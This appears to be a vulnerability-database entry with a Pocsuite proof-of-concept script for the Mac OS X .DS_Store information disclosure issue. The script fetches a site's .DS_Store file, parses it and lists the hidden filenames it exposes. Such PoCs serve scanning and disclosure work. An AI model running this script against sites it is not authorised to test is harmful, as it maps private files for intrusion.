Lucene search
K

Apple Macintosh OS X .DS_Store 信息泄露漏洞

🗓️ 30 Mar 2015 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 33 Views

Apple Mac OS X .DS_Store Information Disclosure Vulnerability This Python script detects and exploits the .DS_Store file information leakage vulnerability in Apple's Mac OS X. It utilizes the ds_store library to parse the file and extract its content. The vulnerability allows developers to unintentionally expose sensitive information by uploading the .DS_Store file to a website during the development process.

Code

                                                #!/usr/bin/env python
# coding: utf-8
import re

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

from ds_store import DSStore

class TestPOC(POCBase):
    vulID = '1729'  # vul ID
    version = '1'
    author = ['ricter']
    vulDate = '2015-03-09'
    createDate = '2015-03-09'
    updateDate = '2015-03-09'
    references = ['http://www.securityfocus.com/bid/3324/discuss']
    name = 'Apple Macintosh OS X .DS_Store Information Disclosure'
    appPowerLink = 'http://www.apple.com'
    appName = 'Apple Macintosh OS X'
    appVersion = 'all version'
    vulType = 'Information Disclosure'
    desc = '''
        在开发过程中开发者可能会把 .DS_Store 文件上传到网站上导致
        信息泄露漏洞。
    '''

    samples = ['']
    install_requires = ['ds_store==1.0.1']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        url = '%s/.DS_Store' % self.url
        response = req.get(url).content
        filelist = []
        if '\x00\x00\x00\x01\x42\x75\x64\x31' in response:
            try:
                with DSStore.open(response, 'r+') as obj:
                        for i in obj:
                            filelist.append(i.filename)
            except Exception, e:
                print '[-] Error: %s' % str(e)
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = url
            result['FileInfo']['Content']  = set(list(filelist))

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation